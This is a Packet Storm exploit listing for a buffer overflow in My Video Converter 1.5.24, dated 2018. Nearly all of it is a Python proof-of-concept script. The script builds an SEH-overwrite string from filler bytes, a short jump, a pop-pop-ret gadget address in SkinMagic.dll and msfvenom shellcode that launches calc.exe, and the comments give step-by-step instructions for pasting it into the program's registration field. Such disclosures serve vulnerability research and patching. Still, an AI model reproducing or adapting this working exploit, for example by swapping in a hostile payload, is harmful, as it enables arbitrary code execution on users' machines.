My Video Converter 1.5.24 Buffer Overflow

2018-08-01T00:00:00
ID PACKETSTORM:148771
Type packetstorm
Reporter Shubham Singh
Modified 2018-08-01T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
  
# Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow   
# Discovery by : Shubham Singh  
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]  
# Email : spiritedwolf@protonmail.com  
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit   
# Discovey Date : 29/07/2018  
# Software Link : http://www.divxtodvd.net/my_video_converter.exe  
# Tested Version : 1.5.24  
# Tested on OS : Windows XP Service Pack 3 x86  
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".  
# Just copy the text inside "exploit.txt" and start the My Video Converter 1.5.24 program and click on "Register".  
# In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator poped up.  
# Greetz : @FuzzySec @LiveOverflow @hexachordanu  
  
buffer = "\x41" * 996  
#Short Jump address  
nseh = "\xeb\x10\x90\x90"   
#0x1002434b : pop ebp # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\My Video Converter\SkinMagic.dll)  
seh= "\x4B\x43\x02\x10"   
nops = "\x90" * 16  
  
#badchar \x00\x0a\x0d  
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f python  
buf = ""  
buf += "\xbf\x4d\xb3\x6b\x1e\xda\xda\xd9\x74\x24\xf4\x58\x33"  
buf += "\xc9\xb1\x31\x31\x78\x13\x83\xe8\xfc\x03\x78\x42\x51"  
buf += "\x9e\xe2\xb4\x17\x61\x1b\x44\x78\xeb\xfe\x75\xb8\x8f"  
buf += "\x8b\x25\x08\xdb\xde\xc9\xe3\x89\xca\x5a\x81\x05\xfc"  
buf += "\xeb\x2c\x70\x33\xec\x1d\x40\x52\x6e\x5c\x95\xb4\x4f"  
buf += "\xaf\xe8\xb5\x88\xd2\x01\xe7\x41\x98\xb4\x18\xe6\xd4"  
buf += "\x04\x92\xb4\xf9\x0c\x47\x0c\xfb\x3d\xd6\x07\xa2\x9d"  
buf += "\xd8\xc4\xde\x97\xc2\x09\xda\x6e\x78\xf9\x90\x70\xa8"  
buf += "\x30\x58\xde\x95\xfd\xab\x1e\xd1\x39\x54\x55\x2b\x3a"  
buf += "\xe9\x6e\xe8\x41\x35\xfa\xeb\xe1\xbe\x5c\xd0\x10\x12"  
buf += "\x3a\x93\x1e\xdf\x48\xfb\x02\xde\x9d\x77\x3e\x6b\x20"  
buf += "\x58\xb7\x2f\x07\x7c\x9c\xf4\x26\x25\x78\x5a\x56\x35"  
buf += "\x23\x03\xf2\x3d\xc9\x50\x8f\x1f\x87\xa7\x1d\x1a\xe5"  
buf += "\xa8\x1d\x25\x59\xc1\x2c\xae\x36\x96\xb0\x65\x73\x68"  
buf += "\xfb\x24\xd5\xe1\xa2\xbc\x64\x6c\x55\x6b\xaa\x89\xd6"  
buf += "\x9e\x52\x6e\xc6\xea\x57\x2a\x40\x06\x25\x23\x25\x28"  
buf += "\x9a\x44\x6c\x4b\x7d\xd7\xec\xa2\x18\x5f\x96\xba"  
exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))  
f = open ("exploit.txt", "w")  
f.write(exploit)  
f.close()  
  
`